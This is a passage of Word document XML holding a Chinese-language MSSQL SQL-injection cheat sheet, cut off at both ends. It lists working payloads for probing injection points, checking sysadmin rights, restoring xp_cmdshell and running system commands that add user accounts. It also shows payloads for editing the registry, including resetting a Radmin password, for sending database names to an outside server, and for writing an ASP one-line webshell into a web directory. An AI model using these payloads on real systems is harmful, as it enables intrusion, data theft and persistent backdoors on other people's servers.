        <w:t>搜索类型</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>' and char(124)%2Buser%2Bchar(124)=0 and '%'=' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>爆</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and user&gt;0 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>' and user&gt;0 and ''=' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>检测是否为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SA</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>检测是不是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and exists (select * from sysobjects);-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>检测是否支持多行</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @d int;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>恢复</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> xp_cmdshell </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>｛ＡＴ｝</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>@version') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//----------------------- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>执行命令</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//----------------------- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>首先开启沙盘模式：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>然后利用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>jet.oledb</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>执行系统命令</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> admin admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>1234 /add")') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>执行命令</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>判断</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>扩展存储过程是否存在：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="001F1794">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://192.168.1.5/display.asp?keyno=188</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001F1794">
        <w:t> and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>写注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>REG_SZ </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>读注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>读取目录内容</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_dirtree 'c:\winnt\system32\',1,1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>数据库备份</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>backup database pubs to disk = 'c:\123.bak' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>爆出长度</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>更改</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>sa</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>口令方法：用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>综合利用工具连接后，执行命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_password NULL,'</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>新密码</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>','sa' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>添加和删除一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SA</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>权限的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master.dbo.sp_addlogin test,ptlove </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master.dbo.sp_addsrvrolemember test,sysadmin </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>删除扩展存储</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>过</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>过程</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>的语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>: </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_dropextendedproc 'xp_cmdshell' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>添加扩展存储过过程</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>GRANT exec On xp_proxiedadata TO public </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>停掉或激活某个服务。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_servicecontrol 'stop','schedule' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master..xp_servicecontrol 'start','schedule' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>dbo.xp_subdirs </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>只列某个目录下的子目录。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>dbo.xp_makecab </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>将目标多个档案压缩到某个目标档案之内。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>dbo.xp_makecab </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'c:\test.cab','mszip',1, </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'C:\Inetpub\wwwroot\SQLInject\login.asp', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'C:\Inetpub\wwwroot\SQLInject\securelogin.asp' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xp_terminate_process </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>停掉某个执行中的程序，但赋予的参数是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> Process ID</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>利用</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>工作管理员</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>，透过选单「检视」</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>「选择字段」</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>勾选</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> pid</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>，就可以看到每个执行程序的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> Process ID </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xp_terminate_process 2484 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>xp_unpackcab </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>解开压缩档。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xp_unpackcab 'c:\test.cab','c:\temp',1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>某机，安装了</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>radmin</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>，密码被修改了，</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>regedit.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>不知道被删除了还是被改名了，</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>net.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>不存在，没有办法使用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">regedit /e </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>导入注册文件，但是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>mssql</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>sa</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>权限，使用如下命令</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>即可修改密码为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>12345678</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>。如果要修改端口值</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>则端口值改为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>1234 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>create database lcx; </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>Create TABLE ku(name nvarchar(256) null); </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>Create TABLE biao(id int NULL,name nvarchar(256) null); </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到数据库名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>中创建表，看看权限怎样</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> sp_makewebtask</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>直接在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>目录里写入一句话马：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="001F1794">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dblogin123.asp?usernam ... btask%20'd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001F1794">
        <w:t>:\www\tt\88.asp','%20select%20''&lt;%25execute(request("a"))%25&gt;''%20';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>更新表内容</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>Update films SET kind = 'Dramatic' Where id = 123 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>删除内容</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>delete from table_name where Stockid = 3 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>注射语句的经典总结</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>注射语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>判断有无注入点</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>' ; and 1=1 and 1=2 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜表一般的表的名称无非是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">admin adminuser user pass password </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>.. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select count(*) from *) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select count(*) from admin) ---</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>判断是否存在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>这张表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>数目</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>如果遇到</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">0&lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>返回正确页面</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> 1&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>返回错误页面说明</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>数目就是</w:t>
      </w:r>
